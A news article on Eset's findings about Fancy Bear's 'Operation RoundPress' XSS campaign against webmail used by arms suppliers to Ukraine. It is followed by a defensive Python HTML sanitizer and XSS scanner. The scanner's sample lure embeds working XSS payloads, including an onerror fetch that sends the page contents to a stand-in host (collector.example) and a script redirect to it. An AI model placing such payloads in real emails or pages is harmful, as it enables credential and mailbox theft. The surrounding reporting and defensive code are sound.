Russian Hackers Take Aim at Ukraine's Arms Suppliers: A Deep Dive into the Fancy Bear Cyberattacks
Fancy Bear targets weapon manufacturers supplying Ukraine: defence companies in Ukraine and neighbouring countries hit through their webmail
The Russian cyberespionage group Fancy Bear, also tracked as Sednit or APT28, has been running targeted attacks against arms manufacturers that supply weapons to Ukraine. The finding comes from a recent report by the Slovak security firm Eset, headquartered in Bratislava. The campaign focuses primarily on producers of Soviet-era weaponry in Bulgaria, Romania and Ukraine, with further targets in Africa and South America.
From the Bundestag to Your Mailbox
Fancy Bear has been identified as the group behind attacks on high-profile targets such as the German Bundestag (2015), the 2016 US presidential campaign of Hillary Clinton, and the SPD party headquarters (2023). The group is considered part of a broader Russian intelligence-service strategy of using cyberattacks for political influence and destabilization.
Into the Inbox Jungle
The current espionage campaign, which Eset calls "Operation RoundPress," exploits cross-site scripting (XSS) vulnerabilities in widely used webmail software: Roundcube, Zimbra, Horde and MDaemon. Most of these flaws had already been fixed by the vendors, so regular patching would have closed them. In the case of MDaemon, however, the attackers used a previously unknown vulnerability for which no patch existed at the time, leaving affected companies with nothing to apply.
Malicious Mailings
According to Eset researchers, the attacks start with emails dressed up as news articles. To make them credible, the messages imitate a trusted outlet such as the Kyiv Post or the Bulgarian news portal News.bg. The HTML body of the email carries hidden JavaScript; when the recipient opens the message in the webmail client, the browser executes that script without any click on a link or attachment.
No Room to Run
The JavaScript payload, which Eset names "SpyPress.MDAEMON" in the MDaemon case, steals login credentials, monitors the mailbox and can also get around two-factor authentication (2FA). The attackers use it to set up application passwords on the compromised mailbox: long-lived credentials intended for mail clients that allow a login with a password alone, sidestepping the second factor that the normal sign-in would demand, and giving the attackers persistent access.
Cybersecurity Alert!
Eset researcher Matthieu Faou issues a stark warning: many companies still run outdated webmail servers, and all it takes for the malicious script to execute is for a user to view the email in the browser.
Enrichment Data: Identifying Operation RoundPress
Operation RoundPress is the name Eset gave to a campaign by Fancy Bear, a Russian cyberespionage group attributed to Russia's military intelligence directorate (GRU). Its goal is to compromise organizations involved in supplying weapons to Ukraine, together with government entities and defence contractors, in countries including Bulgaria, Romania and Ukraine and further afield in Africa and South America.
Fancy Bear's Methods
- Exploitation of webmail vulnerabilities: Fancy Bear exploits cross-site scripting (XSS) flaws in Roundcube, Horde, MDaemon and Zimbra. A crafted HTML email injects JavaScript into the victim's webmail page; because the script runs inside the authenticated webmail session, it can read the mailbox, steal credentials and exfiltrate sensitive information.
- Spearphishing: the XSS payload is delivered by spearphishing emails dressed up as news articles and aimed at high-ranking officials. The target does not need to click anything; simply opening the message in the webmail client runs the injected code.
- Bypassing two-factor authentication (2FA): the payload creates application passwords for the compromised mailbox, which give the attackers persistent access that never prompts for a second factor. More generally, the group is known for circumventing authentication controls through exploitation of weaknesses in login processes and through social engineering.
- Investigations of Operation RoundPress show it targets arms companies in Bulgaria, Romania and Ukraine as well as in Africa and South America, with the aim of stealing information related to the supply of weapons to Ukraine.
- Eset researchers in Bratislava found that Fancy Bear exploits vulnerabilities in Roundcube, Horde, MDaemon and Zimbra webmail to steal login credentials, monitor mailboxes and, via application passwords, bypass 2FA.
- Fancy Bear, infamous for the attacks on the German Bundestag and on Hillary Clinton's campaign, is attributed to the Main Intelligence Directorate (GRU) of Russia and uses cyberattacks to exert political influence and destabilize regions such as Eastern Europe and Ukraine.
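The mechanism described in the article ("all it takes is viewing the email") and in the Methods list above comes down to one defect: the webmail client renders attacker-controlled HTML without an allow-list, so a script, an event-handler attribute or a javascript: URL inside the message body runs in the victim's authenticated session. The following is an added example, not Eset's code and not the SpyPress payload, showing the two sides of that bug in Python: a scanner that reports the constructs a stored-XSS-via-email relies on, and an allow-list sanitizer that rebuilds the body so none of them survive. The lure body is constructed for the demo, and collector.example is a hypothetical attacker endpoint; the allow-lists are illustrative rather than a drop-in replacement for a maintained sanitizer library.

```python
"""Allow-list HTML sanitizer and XSS indicator scanner for webmail message bodies.

Added example, not Eset's code and not the SpyPress payload. SAMPLE_LURE is a
constructed message body; collector.example is a hypothetical attacker host.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "div", "span", "table", "tr", "td", "th",
                "h1", "h2", "h3", "img"}
# Attributes kept per tag; anything else (on*, style, srcdoc, ...) is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br", "img"}
# Elements whose inner content is discarded too, not merely unwrapped.
CONTENT_DROPPED = {"script", "style", "iframe", "object", "embed", "svg", "math", "template"}
ALWAYS_FLAGGED = CONTENT_DROPPED | {"meta", "link", "base", "form"}


def is_safe_url(value: str) -> bool:
    """Accept only absolute http(s)/mailto URLs. Browsers skip tabs and newlines
    inside a scheme ("java\\tscript:"), so whitespace is removed before checking."""
    v = "".join(ch for ch in value if not ch.isspace()).lower()
    return v.startswith(SAFE_SCHEMES)


class XssScanner(HTMLParser):
    """Lists the constructs that make a body unsafe to render as-is.
    HTMLParser decodes entity-encoded attribute values, so
    href="&#106;avascript:" is seen here as "javascript:", as a browser would."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ALWAYS_FLAGGED:
            self.findings.append(f"disallowed tag <{tag}>")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and not is_safe_url(value):
                self.findings.append(f"unsafe {name} on <{tag}>: {value[:40]!r}")


class Sanitizer(HTMLParser):
    """Re-serialises the body keeping only allow-listed tags and attributes.
    Text is re-escaped; comments and declarations fall through HTMLParser's
    no-op defaults and so are dropped."""

    def __init__(self):
        super().__init__()
        self.out = []
        self._dropping = None  # name of the CONTENT_DROPPED element we are inside

    def handle_starttag(self, tag, attrs):
        if self._dropping:
            return
        if tag in CONTENT_DROPPED:
            self._dropping = tag
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown element is unwrapped; its text still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops every on* handler and style attribute
            value = value or ""
            if name in URL_ATTRS and not is_safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._dropping:
            if tag == self._dropping:
                self._dropping = None
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._dropping:
            self.out.append(escape(data))


def scan_for_xss(body: str) -> list:
    p = XssScanner()
    p.feed(body)
    p.close()
    return p.findings


def sanitize_html(body: str) -> str:
    p = Sanitizer()
    p.feed(body)
    p.close()
    return "".join(p.out)


# Constructed lure body: a fake "news article" carrying three hidden hooks.
SAMPLE_LURE = (
    "<p><b>Kyiv Post</b>: Parliament debates defence budget</p>"
    '<img src="x" onerror="fetch(\'https://collector.example/?d=\'+'
    'encodeURIComponent(document.body.innerHTML))">'
    '<a href="&#106;avascript:void(0)" onclick="alert(1)">Read more</a>'
    "<script>document.location='https://collector.example/login'</script>"
    "<p>Full story on our site.</p>"
)

if __name__ == "__main__":
    for finding in scan_for_xss(SAMPLE_LURE):
        print("FLAG:", finding)
    print(sanitize_html(SAMPLE_LURE))
```

Run against the constructed lure, the scanner reports the broken image with its onerror handler, the entity-encoded javascript: link, the onclick handler and the script element; the sanitizer returns only the two paragraphs plus a bare `<img>` and `<a>`. A sanitizer of this kind is the primary fix for the class of bug RoundPress exploited; a Content-Security-Policy on the webmail origin that forbids inline script is the second layer that still blocks an event handler if a sanitizer bug lets one through.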